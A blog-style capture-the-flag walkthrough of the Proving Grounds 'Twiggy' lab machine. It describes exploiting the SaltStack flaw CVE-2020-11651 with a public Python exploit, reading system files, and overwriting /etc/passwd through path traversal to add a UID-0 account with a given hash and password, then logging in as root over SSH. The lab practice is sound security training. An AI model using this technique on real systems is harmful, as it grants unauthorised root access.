Proving Grounds Practice —Twiggy
Hello, today I’ll talk about the solution of Proving grounds Practice —Twiggy.
First, we run an Nmap scan.
I start examining the services on the ports one by one.
After browsing the website on port 80, I tried the possible passwords on the admin login page, but it was not successful.
Later, I obtained the following information on port 8000.
I also started looking for exploits regarding the ZeroMQ service on port 4005 and 4006.
When I searched on Google, I saw that there were two related vulnerabilities on the first page that appeared.
I started looking for code to exploit CVE-2020–11651 on Google.
I downloaded the python file from the link below.
When I ran it, I encountered an error due to the lack of the “salt” module and installed the module.
Even though I tried to get a shell, I was unsuccessful and I saw that this python code has the ability to read files. I continued by reading important files.
I used the -h parameter to see what I could do with Python code. I saw that we could upload files. We can upload our own passwd file.
Creating a Passwd File
- touch passwd
- After adding the contents of the passwd file we read, we will add our own information to the bottom line.
- pwend:$1$r/5WEL9l$gr6/QAygoP4zISL2SSrfr1:0:0:root:/root:/bin/bash
- The final version of the file we created-
Now we can upload the file.
python3 exploit.py --master 192.168.187.62 --upload-src passwd --upload-dest ../../../../../../etc/passwdAfter uploading the file, we can ssh with the username and password we created. (pwend:123)
Yes, we now have root. We can get our proof.txt file.
We find our flag and complete the challenge. Keep hacking !
Practice makes perfect :)
